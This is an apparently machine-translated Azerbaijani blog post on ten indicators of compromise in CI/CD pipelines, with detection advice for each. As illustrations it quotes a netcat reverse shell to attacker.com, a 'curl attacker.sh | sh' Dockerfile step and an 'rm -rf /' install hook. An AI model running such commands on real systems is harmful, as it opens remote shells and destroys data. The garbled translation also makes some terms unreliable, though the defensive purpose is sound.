Giriş: Kibertəhlükəsizlikdə kompromis göstəriciləri nələrdir?
Kompromis göstəriciləri sisteminizin və ya pipeline hücuma məruz qala bilər. Sadə sözlə, kompromis göstəriciləri təcavüzkarların qəribə kimi qoyduğu izlərdir logins, fayl dəyişiklikləri və ya gizli zərərli proqram. Daxildir Beynəlxalq Komissiyanın kibertəhlükəsizliyi, onlar cinayət yerində barmaq izləri kimi hərəkət edir və sizə bir şeyin səhv olduğunu göstərən açıq dəlillər verir. Buna görə də, tərtibatçılar soruşduqda kompromis əlamətləri nələrdir, cavab yalnız serverlər və ya firewalllarla məhdudlaşmır, həm də müasir dünyada gizlənmiş riskləri də əhatə edir. CI/CD pipelines.
Bunlarda pipelines, təcavüzkarlar kodu dəyişdirə, zərərli asılılıqlar daxil edə və ya qurulma addımlarını fərqinə varmadan dəyişdirə bilərlər. Bununla belə, əksər təlimatlar hələ də yalnız serverlərə və ya şəbəkələrə yönəlib. Nəticədə, proqram təminatı təchizatı zənciri ən asan hədəflərdən birinə çevrilib.
Buna görə də kompromis əlamətləri tapmaq CI/CD pipelines vacibdir. Hər şeydən əvvəl, bu, komandalara zərərli proqramları bloklamağa, sirləri qorumağa və proqram təminatının çatdırılmasının hər addımını təhlükəsiz etməyə kömək edir.
Güzəştin Ən Yaxşı 10 Göstəricisi CI/CD Pipelines
Kompromis göstəricilərini izah edərkən əksər siyahılar serverlərə və ya şəbəkələrə yönəlir. Lakin CI/CD pipelines, təcavüzkarlar çox fərqli barmaq izləri buraxırlar. Bu siqnalları tanımaq proaktiv müdafiə üçün çox vacibdir. Aşağıda hər bir tərtibatçı və təhlükəsizlik mühəndisinin diqqət yetirməli olduğu 10 IOC kibertəhlükəsizlik qırmızı bayraqları verilmişdir.
1. Şübhəli Asılılıq Dəyişiklikləri
Kompromislərin əsas göstəricilərindən biri pipelines qəfil, qəribə bir asılılıq yeniləməsidir. Hücumçular tez-tez təhlükəli paketlər əlavə etmək üçün paket menecerlərindəki inkişaf etdiricilərin etibarından istifadə edirlər.
Məsələn, npm a-da package.json fərq birdən aşağıdakıları əhatə edə bilər:
Bu cür dəyişikliklər təhlükəsiz görünə bilər, lakin hər bir quruluşa troyanlaşdırılmış kod yeridə bilər.
Təsir: Təhlükəli proqramlar zərərli proqramları mənbədən miras alır.
Aşkarlama: Asılılıq icmallarını tətbiq edin, kilid fayl fərqlərini izləyin və hər zaman yeni paketləri skan edin.
2. Quruluşlarda qarışıq kod
Zərərli proqram müəllifləri rəyləri keçmək üçün qarışıqlığa əsaslanırlar. Nəticədə, bu güzəşt göstəricisi CI/CD pipelines tutmaq ən çətinlərindən biri ola bilər. Əslində, qarışıq faydalı yüklər çox vaxt xəbərdarlıq etmədən açıq mənbəli kitabxanalara və ya konteyner şəkillərinə daxil olur.
Misal üçün:
- PyPI paketindən istifadə olunur
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - Lazım olmayan UPX binarları ilə dolu Docker görüntüsü.
- JavaScript ilə doludur
\x41\x42etimadnamə oğurlayanları gizlətməkdən qaçır.
Təsir: Gizli kod qurulma və ya işləmə müddətində səssizcə icra olunur ki, bu da bunu IOC kibertəhlükəsizliyində kritik bir siqnal halına gətirir.
Aşkarlama: Birləşdirmək SAST kodlanmış və ya paketlənmiş kodu işarələmək üçün zərərli proqram təminatını skan etməklə. Hər şeydən əvvəl, qarışıqlığı əlavə araşdırmaya layiq olan təhlükə siqnalı kimi qəbul edin.
3. Git-də Açıqlanan Sirrlər: Klassik IOC Kibertəhlükəsizlik Riski
CI/CD pipelines tez-tez sirləri birbaşa depolardan miras alır. Lakin, Git-də sirlər görünəndə, onlar “kompromis göstəriciləri nələrdir” sualına ən aydın cavablardan birinə çevrilirlər. pipelines?" Etimadnamələr Git-ə daxil olduqdan sonra, hücum edənlər onlardan qeyri-müəyyən müddətə istismar edə bilərlər.
Misal üçün:
- A
.envehtiva edən faylAWS_SECRET_KEY=. - Tokenlər içəri itələdi
config.json. - Git tarixində silindikdən sonra da sirlər hələ də görünür.
Təsir: Açıq açarlar hücum edənlərə birbaşa giriş imkanı verir CI/CD pipelines, bulud sistemləri və ya verilənlər bazaları. Buna görə də bu, kompromisin ən təhlükəli göstəricilərindən biridir.
Aşkarlama: istifadə pre-commit hooks və gizli skanlama üçün CI işlərini yerinə yetirin və sızan açarları dərhal ləğv edin. Bundan əlavə, məruz qalma pəncərələrini azaltmaq üçün avtomatlaşdırılmış bərpa tədbirlərini tətbiq edin.
4. Təhrif olunmuş Pipeline Konfiqurasiyalar: Gizli Güzəşt Göstəriciləri
Pipeline konfiqurasiyalar yüksək dəyərli hədəflərdir, çünki tək bir dəyişiklik tez-tez bütün iş axınını ələ keçirirNəticə etibarilə, dəyişdirilib pipeline fayllar ənənəvi monitorinq alətlərinin nadir hallarda aşkarladığı əsas IOC kibertəhlükəsizlik riskidir.
Misal üçün:
GitHub Əməliyyatlarında:
- GitLab-da: zərərli bir iş əlavə edildi
.gitlab-ci.ymlhəssas məlumatları sızdırır. - Jenkins-də:
sh "nc -e /bin/bash attacker.com 4444".
Təsir: Bu təsdiqlənməmiş dəyişikliklər sizi pipeline hücum edənlər üçün daimi arxa qapıya çevrilir ki, bu da açıq şəkildə kompromis göstəricisi hesab olunur.
Aşkarlama: İmzalanmış konfiqurasiyaları tətbiq edin, PR təsdiqlərini tələb edin və gözlənilməz işləri izləyin. Bundan əlavə, təyin edin guardrails dəyişdirilmiş iş axınlarını avtomatik olaraq bloklayır.
5. İmtiyazlı IaC Defoltlar
Yanlış konfiqurasiya edilmiş infrastruktur tərifləri çox vaxt gizli arxa qapılar yaradır. Nəticədə, imtiyazlı standartlar IaC BOK-un klassik kibertəhlükəsizlik riskidir.
Misal üçün:
- Kubernetes yerləşdirmə icazəsi verən podlar
privileged: true. - Xidmətləri ifşa edən Helm charts
0.0.0.0:22.
Təsir: Hücumçular kök səviyyəli giriş əldə edir və ya daxili xidmətləri ictimaiyyətə açıq şəkildə ifşa edirlər. Nəticə etibarilə, bu problemlər hücum səthini əhəmiyyətli dərəcədə genişləndirir.
Aşkarlama: tətbiq etmək IaC birləşmədən əvvəl ən az imtiyazı tətbiq etmək üçün skanlama. Bundan əlavə, hər bir konfiqurasiyanın bir hissəsi kimi nəzərdən keçirildiyinə əmin olun pipeline.
6. Qeyri-adi Bilik Davranışları
Hücumçular tez-tez dəyişirlər pipeline zərərli hərəkətlərdə sürüşmək davranışı. Başqa sözlə, qeyri-adi qurma fəaliyyəti, kompromis göstəricilərinin nələr olduğuna dair ən aydın cavablardan biridir. CI/CD pipelines.
Misal üçün:
- Qəribə domenlərə çıxış şəbəkəsi sorğuları edən qurğular.
- Node.js layihəsi qəfildən PowerShell-i işə salır
npm install. - Quraşdırma skriptlərində müəyyən edilməmiş böyük ikili faylları yükləmək üçün CI işi.
Təsir: Zərərli proqram təminatı paylama nöqtələri kimi çıxış edə bilər. Ən əsası, onlar hər yerləşdirmədə zərərli proqram yüklərini yayırlar.
Aşkarlama: Gözlənilməz proseslər və ya bağlantılar üçün qurma jurnallarını izləyin. Bundan əlavə, normadan kənar davranışları qeyd etmək üçün anomaliya aşkarlamasını konfiqurasiya edin.
7. Zərərli Paket Skriptləri IOC Kibertəhlükəsizlik Riskləri Kimi
Paket menecerləri həyat dövrünü dəstəkləyir hooks təcavüzkarların istismar etdiyi. Buna görə də, npm, PyPI və ya Docker fayllarında zərərli skriptlər kompromisin güclü göstəriciləridir.
Misal üçün:
- dəqiqədə:
postinstallskript işləyirrm -rf /və ya C2-yə mayak çəkmək. - PyPI:
setup.pyQuraşdırma zamanı gizli Python kodunu icra edir. - Dockerfile:
RUN curl attacker.sh | sh.
Təsir: Hücum quraşdırma zamanı, hər hansı bir işləmə müddəti testindən əvvəl baş verir. Nəticə etibarilə, tərtibatçılar çox gec olana qədər bunu hiss etməyə bilərlər.
Aşkarlama: Quraşdırma skriptləri üçün paket manifestlərini skan edin. Bundan əlavə, riskli olanları məhdudlaşdırın hooks in CI/CD məruz qalma ehtimalını azaltmaq üçün işlər.
8. Reyestr Zəhərlənməsinin Güzəşt Göstəriciləri
Hücumçular reyestrlərdəki artefaktları dəyişdirir və ya dəyişdirir və bu hadisələr təchizat zəncirində güzəştin göstəriciləri olan dərslik nümunələridir. pipelines.
Misal üçün:
- Docker şəkil etiketi səssizcə troyanlaşdırılmış təbəqə ilə yeniləndi.
- Daxili paket zəhərlənmiş versiya ilə əvəz edildi.
- npm ad boşluğunda çömbəlmə, məsələn
lodash-proxy.
Təsir: Qeydiyyat artefaktından istifadə edən hər bir quruluş təhlükəyə məruz qalır. Bununla yanaşı, təhlükə sonrakı xidmətlərə də yayılır.
Aşkarlama: Bütün reyestr açılan fayllarında imza və bütövlük yoxlamalarını tətbiq edin. Bundan əlavə, artefakt mənşəyini izləyin SBOM doğrulama.
9. Anomal İstifadəçi Fəaliyyəti BOK-un sübutu kimi
Güzəştə gedən hesablar demək olar ki, həmişə anormal izlər qoyur. Buna görə də, qeyri-adi geliştirici davranışı kompromisin güclü bir göstəricisidir.
Misal üçün:
- CommitYerli vaxtla səhər saat 3-də səsləndirilib.
- Tətildə olan hesablar tərəfindən PR təsdiqləri.
- Pipelineqeyri-adi tezliklə tetiklenir.
Təsir: Hücumçular oğurlanmış etimadnamələrdən zərərli dəyişikliklər etmək üçün sui-istifadə edirlər. Axı, icazəsiz commitnormal iş axınlarına asanlıqla qarışır.
Aşkarlama: Monitor SCM anomaliyalar üçün fəaliyyət, MFA-nı tətbiq etmək və tokenləri müntəzəm olaraq fırlatmaq. Bundan əlavə, şübhəli hallar barədə xəbərdarlıq edin commit və ya təsdiq nümunələri.
10. IOC Kibertəhlükəsizliyində Uğursuz Dürüstlük və ya İmza Yoxlamaları
Ümumi, lakin nəzərə alınmayan bir şey kompromis göstəricisi BOK-un kibertəhlükəsizliyində bu yoxlamalar kodun və ya artefaktların orijinallığını təsdiqləyir. Onları atlamaqla bitir pipelineməruz qalıb.
Nümunələr:
- SHA256 heşi gözlənilən yoxlama cəminə uyğun gəlmir.
- GPG imzası yoxdur və ya etibarsızdır.
- An SBOM imzalanmamış artefaktları göstərir.
Təsir: Dürüstlük pozuntuları çox vaxt saxtakarlıq, qeydiyyatdan zəhərlənmə və ya zərərli proqram təminatının yerləşdirilməsi deməkdir.
Aşkarlama: İmza yoxlamalarını avtomatlaşdırın, yoxlama cəminin doğrulanmasını tətbiq edin və imzalanmamış komponentləri bloklayın. Ən əsası, hər bir uğursuz yoxlamanı güzəştin açıq sübutu kimi qəbul edin.
CI/CD Qısa Baxışda Kompromis Göstəriciləri
| Kompromis Göstəricisi (IOC) | Təsir CI/CD Pipelines | Necə Aşkarlamalı |
|---|---|---|
| Şübhəli Asılılıq Dəyişiklikləri | Hücumçular paket menecerlərinə zərərli kitabxanalar yerləşdirirlər və bu da pozulmuş versiyalara səbəb olur. | Kilid faylındakı fərqləri izləyin, asılılıq icmallarını tətbiq edin və asılılıqları davamlı olaraq skan edin. |
| Quruluşlarda qarışıq kod | Gizli faydalı yüklər quruluşlar və ya işləmə müddətində aşkarlanmadan işə düşür. | istifadə SAST və base64, hex və ya paketlənmiş kod nümunələrini qeyd etmək üçün zərərli proqram təminatının skan edilməsi. |
| Git-də Açıqlanan Sirrlər | Sızdırılmış tokenlər və ya API açarları hücum edənlərə kritik sistemlərə birbaşa giriş imkanı verir. | Git-də gizli skanları işə salın hooks və sızdırılmış etimadnamələri avtomatik olaraq ləğv edin. |
| Təhrif olunmuş Pipeline Konfigürasyonlar | Modifikasiya edilmiş iş axınları məlumatların çıxarılmasına və ya içəridə qalmasına imkan verir CI/CD. | PR təsdiqlərini tələb edin, imzalanmış konfiqurasiyaları tətbiq edin və monitorinq edin pipeline dəyişikliklər. |
| Imtiyazlı IaC Defoltlar | Həddindən artıq icazə verən rollar və ya təhlükəsiz olmayan standart parametrlər bulud mühitlərini ifşa edir. | Ən az imtiyaz tətbiqi üçün Terraform, Kubernetes və Helm fayllarını skan edin. |
| Qeyri-adi Bina Davranışları | Pipelinezərərli proqram təminatının paylanma nöqtələri və ya yan hərəkət üçün istifadə olunur. | Gözlənilməz yükləmələr, proseslər və ya xaric zənglər üçün qurma jurnallarını təhlil edin. |
| Zərərli Paket Skriptləri | Gizli quraşdırma öncəsi/sonrası skriptlər, işləmə müddəti testindən əvvəl faydalı yükləri tetikler. | Riskli npm/PyPI skriptlərini bloklayın və icrasını məhdudlaşdırın CI/CD iş yerləri. |
| Qeydiyyat Zəhərlənməsi | Troyanlaşdırılmış artefaktlar reyestrlərdə etibarlı şəkilləri və ya ikili faylları əvəz edir. | Yoxlama cəmlərini yoxlayın, imza doğrulamasını tətbiq edin və reyestrləri proaktiv şəkildə skan edin. |
| Anomal İstifadəçi Fəaliyyəti | Zərərli hesablar zərərli proqramlar yayır commits və ya tetikleyici pipelines. | MFA-nı tətbiq edin, monitorinq edin commitanomaliyalar üçün s və təhlil edin login nümunələri. |
| Uğursuz Dürüstlük və ya İmza Yoxlamaları | Daxil olan dəyişdirilmiş kodu, asılılıqları və ya şəkilləri göstərir pipeline. | Bütövlük yoxlamalarını avtomatlaşdırın və imzalanmamış və ya uyğunsuz komponentləri bloklayın. |
Niyə Ənənəvi Beynəlxalq Komissiyanın Kibertəhlükəsizliyi Uğursuzdur CI/CD Risklər
Əksər təşkilatlar artıq serverlərdə, kompüterlərdə və ya şəbəkələrdə güzəşt göstəricilərini izləyir. Lakin, Beynəlxalq Komissiyanın kibertəhlükəsizliyə bu klassik yanaşması nəzərə almır CI/CD pipelines, hazırda ən vacib hücum səthlərindən biridir. Əslində, pipelines ənənəvi alətlərin aşkar edə bilmədiyi unikal güzəşt siqnallarını göstərir.
Ənənəvi Təhlükəsizlikdə Güzəşt Göstəriciləri
Ənənəvi IOC kibertəhlükəsizliyində diqqət adətən aşağıdakılara yönəldilir:
- qeyri-adi logins və ya oğurlanmış etimadnamələri göstərən IP ünvanları.
- Zərərli proqram aşkar edən şübhəli fayl heşləri və ya qeyd defteri dəyişiklikləri.
- Məlumatların çıxarılmasına işarə edən gözlənilməz çıxış trafiki.
Bunlar həmçinin izlənilən tanınmış göstəricilərdir MITER ATT&CK çərçivəsi, ümumi rəqib davranışlarını və taktikalarını xəritələşdirir. Bunlar faydalı siqnallardır. Lakin, onlar əsasən əməliyyat sistemlərinə və ya korporativ şəbəkələrə tətbiq olunur. Nəticədə, proqram təminatı təchizatı zəncirində daha əvvəl baş verən incə müdaxiləni qaçırırlar.
Niyə CI/CD Pipelines Fərqlidir
CI/CD pipelines, inkişaf etdiricilərin olduğu avtomatlaşdırılmış mühitlərdir commit kod, pull asılılıqları və release builds. Hücumçular bilirlər ki, burada hər yerləşdirmədə bir kompromisin baş verdiyi müşahidə olunur. Buna görə də, kompromisin göstəriciləri hansılardır? CI/CD pipelines? Onlar çox fərqli görünürlər:
- Zərərli asılılıq package.json və ya requirements.txt fayllarına səssizcə əlavə edildi.
- Git-də API açarları və ya tokenləri aşkarlanır commits və ya .env faylları.
- npm və ya PyPI paketlərinə qarışıq kod yeridilib.
- Terraform və ya Kubernetes faylları, imtiyazlı: true kimi təhlükəsiz olmayan standart parametrlərə malikdir.
- Pipeline məlumatları süzmək və ya arxa qapıları açmaq üçün redaktə edilmiş işlər.
Bu kompromis siqnalları CI/CD görünməz qalmaq standard təhlükəsizlik vasitələri.
IOC Kibertəhlükəsizliyindəki Boşluq
Bir çox komanda güzəşt göstəricilərinin dəyərini başa düşsə də, yenə də yalnız serverlərdən və şəbəkə qeydlərindən aşkarlanmaya etibar edirlər. Buna görə də, təcavüzkarlar adi izlər qoymadan qurğuları zəhərləyə və ya zərərli proqram təminatı daxil edə bilərlər. Buna görə də XZ Utils arxa qapısı və ya zərərli npm paketləri kimi hadisələr istehsalata çatana qədər aşkarlanmamışdır.
Bu cür təchizat zəncirindəki güzəştlər də vurğulanır CISA-nın təchizat zənciri təhlükəsizliyi üzrə rəhbərliyi, bu da hücum edənlərin getdikcə daha çox hədəf aldığını xəbərdar edir CI/CD pipelinevə reyestrlər.
Bu paket
Ənənəvi BOK kibertəhlükəsizliyi zəruridir, lakin kifayət deyil. Hər şeydən əvvəl, komandalar özünəməxsus kompromis göstəricilərini tanımalıdırlar. CI/CD pipelines. Yalnız bundan sonra zərərli kodu aşkarlaya bilərlər və ya pipeline ətraf mühitə yayılmazdan əvvəl sui-istifadə.





